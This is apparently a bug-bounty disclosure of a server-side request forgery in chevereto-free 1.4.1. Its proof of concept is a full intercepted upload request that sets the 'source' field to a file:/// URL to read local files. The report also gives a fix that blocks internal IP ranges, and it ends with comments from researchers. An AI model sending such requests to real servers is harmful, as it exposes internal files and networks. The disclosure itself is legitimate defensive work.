Server-Side Request Forgery (SSRF) in chevereto/chevereto-free

Valid

Reported on

Oct 2nd 2021


Description

Attackers can make the server perform arbitrary requests to internal IPs as well as use the file:/// protocol to disclose internal image data.

Proof of Concept

1: Create a valid image file on the server /path/to/index.png

2: Choose add Image URLs and use a valid URL and click OK. Then click Upload and intercept the request:

3: Now change the source to file:///path/to/index.png

/POST /Chevereto-Free-1.4.1/json HTTP/1.1

Host: 10.0.2.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33931558783514564834640665316
Content-Length: 811
Origin: http://10.0.2.15
Connection: close
Referer: http://10.0.2.15/Chevereto-Free-1.4.1/upload

-----------------------------33931558783514564834640665316

Content-Disposition: form-data; name="source"
file:///path/to/index.png

-----------------------------33931558783514564834640665316

Content-Disposition: form-data; name="type"

url
-----------------------------33931558783514564834640665316

Content-Disposition: form-data; name="action"

upload

-----------------------------33931558783514564834640665316

Content-Disposition: form-data; name="timestamp"

163316178669
-----------------------------33931558783514564834640665316

Content-Disposition: form-data; name="auth_token"
31f259f774280b6687c97d04f80a9410c948594e

-----------------------------33931558783514564834640665316
Content-Disposition: form-data; name="nsfw"
0
-----------------------------33931558783514564834640665316--

4: The index.jpg on the local filesystem should be uploaded.

Impact

This vulnerability is capable of leaking internal image files from the server, perform internal portscans as well as interact with internal webservers.

Recommended Fix

Block the file:// protocol and the internal ip ranges

127.0.0.0 – 127.255.255.255

10.0.0.0 - 10.255.255.255

172.16.0.0 - 172.31.255.255

192.168.0.0 - 192.168.255.255

169.254.169.254

We have contacted a member of the chevereto/chevereto-free team and are waiting to hear back 2 months ago
chevereto/chevereto-free maintainer validated this vulnerability 2 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
chevereto/chevereto-free maintainer confirmed that a fix has been merged on 9e2262 2 months ago
The fix bounty has been dropped
haxatron
2 months ago

Researcher


Hi there, thanks for validating the report, instead of only blocking the file:// protocol, you should whitelist http:// and https://

amammad
2 months ago

@maintainer @admin

why my report with same vulnerability was not approved ?

@maintainer instead of ask me for more information just She insulted me ….

https://huntr.dev/bounties/6b170fbc-49f6-44bb-bcb9-498057f71090/

Very interesting ....